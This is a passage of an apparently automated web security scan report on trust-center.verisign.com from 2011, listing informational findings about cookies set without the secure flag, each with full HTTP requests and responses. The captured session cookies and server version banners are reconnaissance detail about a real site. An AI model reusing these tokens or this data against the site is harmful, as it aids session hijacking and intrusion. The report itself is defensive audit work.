GET /process/retail/session_timeout HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:59:40 GMT Server: Apache Set-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html
6.24. https://trust-center.verisign.com/process/retail/trust_initial
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/trust_initial
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:26:31 GMT Server: Apache Set-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001 Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html
6.25. https://trust-center.verisign.com/process/retail/trust_product_selector
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/trust_product_selector
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 41019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]...
6.26. https://trust-center.verisign.com/process/retail/trust_product_selector.do
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /process/retail/trust_product_selector.do
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_product_selector.do HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:02 GMT Server: Apache Set-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
6.27. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/TeaLeafTarget.html
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /rcm/TeaLeafTarget.html HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 Content-Length: 1103 X-TeaLeaf-Page-Objects: 0 Origin: https://trust-center.verisign.com X-TeaLeaf-Page-Img-Fail: 1 X-TeaLeaf-Page-Render: 123 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: undefined; INIT X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941 X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719 <ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" > ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:10 GMT Server: Apache Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 32 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html <html> <body> OK </body> </html>
6.28. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/arrow_progressBar_gray.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: Apache Set-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 91 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a...[SNIP]...
6.29. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/arrow_progressBar_red.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: Apache Set-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 90 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a...[SNIP]...
6.30. https://trust-center.verisign.com/rcm/verisign/images/divider.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/divider.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/divider.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 44 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.. ..........!.......,...... ........;
6.31. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/ico_questionmark.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 374 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....-......8..F.#O.....I.=.2Q.Wu..:...............1Z.\}.*U..B.%K.Bh....Mn....-Q....x.....n..{..n..h}.........................x.....q...4..........................................................[SNIP]...
6.32. https://trust-center.verisign.com/rcm/verisign/images/logo.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/logo.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/logo.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: Apache Set-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 16073 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..=..................................................................................................................................................................................................[SNIP]...
6.33. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/popup_button_left.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 348 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....................................................................................................................................................................................................[SNIP]...
6.34. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/popup_button_right.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 344 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.....................................................................................................................................................................................................[SNIP]...
6.35. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/pricebox_bg.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
